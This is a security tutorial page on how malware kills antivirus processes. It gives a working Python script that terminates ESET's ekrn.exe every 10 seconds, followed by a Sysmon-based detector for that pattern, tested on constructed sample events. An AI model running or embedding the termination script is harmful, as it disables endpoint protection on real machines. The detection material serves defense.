🍫 How Malware Authors Terminate Antivirus Processes at Runtime
Explanation

1. Import Libraries:
   - `psutil` for process management.
   - `time` for adding delays.
2. Define `terminate_process_by_name` Function:
   - Iterates over all running processes and checks if the process name matches `ekrn.exe`.
   - Terminates the process if a match is found.
   - Handles exceptions if the process no longer exists or access is denied.
   - Returns `True` if the process was found and terminated; otherwise, `False`.
3. Main Block:
   - Sets the process name to `ekrn.exe`.
   - Continuously checks for the process every 10 seconds.
   - Prints status messages indicating whether the process was found and terminated.
4. Loop and Delay:
   - The `while True` loop ensures the script keeps running and checking for the process.
   - `time.sleep(10)` introduces a delay of 10 seconds between checks to avoid excessive CPU usage.
```python
import psutil
import time


def terminate_process_by_name(process_name):
    """Terminate processes by their name."""
    # Walk the process table, fetching only the 'name' attribute.
    for process in psutil.process_iter(['name']):
        # Case-insensitive comparison against the target name.
        if process.info['name'].lower() == process_name.lower():
            try:
                process.terminate()
                print(f"Terminated process: {process.info['name']} (PID: {process.pid})")
                return True
            except psutil.NoSuchProcess:
                print(f"Process {process.info['name']} (PID: {process.pid}) no longer exists")
            except psutil.AccessDenied:
                print(f"Access denied to terminate process: {process.info['name']} (PID: {process.pid})")
    return False


if __name__ == "__main__":
    process_name = 'ekrn.exe'
    while True:
        found = terminate_process_by_name(process_name)
        if found:
            print(f"Process {process_name} was found and terminated.")
        else:
            print(f"Process {process_name} not found.")
        # Wait for 10 seconds before checking again
        time.sleep(10)
```
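The polling loop above leaves a regular trail: the same source image asks for terminate rights on `ekrn.exe` every 10 seconds. The detector below is an added example, not code from the original page; it flags that pattern in process-access telemetry. Assumptions: the events are constructed samples using Sysmon Event ID 10 field names (`UtcTime`, `SourceImage`, `TargetImage`, `GrantedAccess`), and the allowlist, thresholds and function names are hypothetical.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

PROCESS_TERMINATE = 0x0001   # Windows access right that TerminateProcess requires
PROTECTED_NAMES = {"ekrn.exe"}   # the process name targeted on this page
# Assumption: full paths of sources expected to hold terminate rights on the target.
ALLOWED_SOURCES = {r"c:\windows\system32\services.exe"}

def _ev(ts, src, access):
    """Build one constructed event; the target path is sample data."""
    return {"UtcTime": ts, "SourceImage": src, "GrantedAccess": access,
            "TargetImage": r"C:\Program Files\ESET\ESET Security\ekrn.exe"}

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    _ev("2024-05-01 10:00:00", r"C:\Users\Public\updater.exe", "0x1"),
    _ev("2024-05-01 10:00:10", r"C:\Users\Public\updater.exe", "0x1"),
    _ev("2024-05-01 10:00:20", r"C:\Users\Public\updater.exe", "0x1"),
    _ev("2024-05-01 10:00:05", r"C:\Windows\System32\services.exe", "0x1fffff"),
    _ev("2024-05-01 10:00:07", r"C:\Windows\System32\taskmgr.exe", "0x1000"),
    _ev("2024-05-01 10:03:00", r"C:\Tools\admin.exe", "0x1"),
]

def find_terminate_pollers(events, min_hits=3, window=timedelta(seconds=60)):
    """Return {source_image: hit_count} for sources that request
    PROCESS_TERMINATE on a protected process min_hits times within window."""
    hits = defaultdict(list)
    for ev in events:
        target = ntpath.basename(ev["TargetImage"]).lower()
        source = ev["SourceImage"].lower()
        if target not in PROTECTED_NAMES or source in ALLOWED_SOURCES:
            continue
        if int(ev["GrantedAccess"], 16) & PROCESS_TERMINATE:
            hits[source].append(datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S"))
    flagged = {}
    for source, times in hits.items():
        times.sort()
        # Slide over sorted timestamps looking for min_hits inside one window.
        for i in range(len(times) - min_hits + 1):
            if times[i + min_hits - 1] - times[i] <= window:
                flagged[source] = len(times)
                break
    return flagged

if __name__ == "__main__":
    for src, n in find_terminate_pollers(SAMPLE_EVENTS).items():
        print(f"ALERT: {src} requested terminate access to a protected process {n} times")
```

A single hit (the `admin.exe` event) and query-only access (`0x1000`) stay below the threshold; only the source repeating at the 10-second cadence is reported.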